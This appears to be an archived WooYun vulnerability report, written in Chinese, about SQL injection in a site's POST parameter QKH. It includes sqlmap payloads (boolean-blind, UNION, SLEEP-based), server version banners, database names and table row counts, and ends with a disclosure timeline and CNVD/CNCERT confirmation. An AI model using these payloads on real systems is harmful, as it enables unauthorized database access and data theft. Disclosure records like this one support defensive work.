乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-02: 细节已通知厂商并且等待厂商处理中 2015-11-06: 厂商已经确认,细节仅向厂商公开 2015-11-16: 细节向核心白帽子及相关领域专家公开 2015-11-26: 细节向普通白帽子公开 2015-12-06: 细节向实习白帽子公开 2015-12-21: 细节向公众公开
get注射还有好多。。基本上的参数都有
http://**.**.**.**/dzqk/ QKH=182 QKG存在post注射
get注射不列举了百分之99的参数都存在注入
back-end DBMS: MySQL 5.0.11available databases [2]:[*] information_schema[*] webusersqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: QKH (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: QKH=182 AND 3450=3450 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: QKH=182 UNION ALL SELECT CONCAT(0x716b716a71,0x426e726a5974446f4148,0x717a717671)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: QKH=182 AND SLEEP(5)---web application technology: PHP 5.2.8, Apache 2.0.59back-end DBMS: MySQL 5.0.11Database: webuser+------------------------+---------+| Table | Entries |+------------------------+---------+| web_infomation | 13206 || web_inter | 7573 || web_online | 4733 || web_infovote | 3561 || web_bmxx | 2883 || web_coll_guest | 2735 || web_bbs | 2576 || members_infomation | 2086 || web_topic_info | 1857 || web_ldxx | 840 || web_source | 568 || web_log | 387 || web_vote_log | 345 || web_infomation_ty | 313 || web_vod | 253 || web_author | 219 || web_topicinfophoto | 188 || web_members_type | 163 || web_wm | 150 || web_topicinfo | 141 || web_ads | 131 || web_menu | 112 || web_link | 98 || web_topic_ty | 95 || web_vote_item | 72 || members_infomation_ty | 40 || web_topicinfo_ty | 40 || web_coll | 35 || web_vote_txt | 34 || web_ads_ty | 32 || web_topicinter | 31 || web_topic | 27 || web_link_ty | 16 || web_vod_ty | 15 || web_wm_ty | 11 || web_live_link | 10 || web_xmt_ty | 10 || web_infomation_comment | 9 || web_live_memoir | 8 || web_user | 6 || web_user_priv | 6 || web_xmt | 6 || web_live_pic | 5 || web_vote | 5 || web_live | 3 || web_topicinfophoto_ty | 3 || web_coll_ty | 2 || web_inter_ty | 2 || web_bbs_ty | 1 || web_bmxx_counter | 1 || web_bmxx_ty | 1 || web_branch | 1 || web_ldxx_ty | 1 || web_title | 1 || web_vote_ty | 1 |+------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: QKH (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: QKH=182 AND 3450=3450 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: QKH=182 UNION ALL SELECT CONCAT(0x716b716a71,0x426e726a5974446f4148,0x717a717671)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: QKH=182 AND SLEEP(5)---web application technology: PHP 5.2.8, Apache 2.0.59back-end DBMS: MySQL 5.0.11available databases [2]:[*] information_schema[*] webuser
ts
危害等级:高
漏洞Rank:10
确认时间:2015-11-06 11:02
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无